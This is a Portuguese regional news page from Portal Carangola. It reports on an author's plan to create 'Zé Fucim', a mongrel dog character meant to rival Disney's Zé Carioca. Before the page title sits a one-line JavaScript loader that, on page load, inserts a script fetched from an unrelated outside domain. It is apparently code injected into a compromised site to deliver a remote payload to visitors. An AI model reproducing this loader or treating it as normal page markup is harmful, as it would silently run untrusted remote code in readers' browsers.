;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); “Zé Fucim” um vira-latas que vai revolucionar o mundo - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

“Zé Fucim” um vira-latas que vai revolucionar o mundo

O Personagem Vira-lata chamado “Zé Fucim”, será um revolucionário Cãozinho que está sendo projetado pelo Escritor, Palestrante e Ator voluntário Bibiano Alex Rocha, autor do Livro (Nos Bastidores da PM) “O efeito de um ideal” Exemplares estes de vendas já esgotadas. Segundo Bibiano: Zé Fucim terá sua própria identidade, nascido em Manhuaçu interior de Minas tendo residido à rua Serafim Tibúrcio da Costa, o Cachorrinho virá para bater frente a frente com o lendário de sucesso Mundial das histórias em quadrinhos, um Papagaio chamado Zé Carioca.

Zé Carioca é o apelido do papagaio José Carioca, criado no começo da década de 40 pelos estúdios Walt Disney em uma turnê pela América Latina, que fazia parte dos esforços dos Estados Unidos para reunir aliados durante a Segunda Guerra Mundial (1939-1945). Historicamente esse esforço na América Latina foi chamado de “Good Neighbor Policy” ou Política da Boa Vizinhança.

O Cachorrinho “Zé Fucim” virá para contradizer o “Zé Carioca”, passando para o Mundo, o que é a verdadeira característica do brasileiro. Segundo o escritor Bibiano Alex Rocha, O Revolucionário e contestador “Zé Fucim” terá dois amigos inceparáveis (Banguelo e Certeza)que cairão na graça e agrado das criaças e dos adultos.

Bibiano Alex Rocha, protocolará o projeto junto ao Governo do Estado, para captação de recursos para externá-lo ao Brasil e no Mundo.

Reportagem: Teógenes Nazaré.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.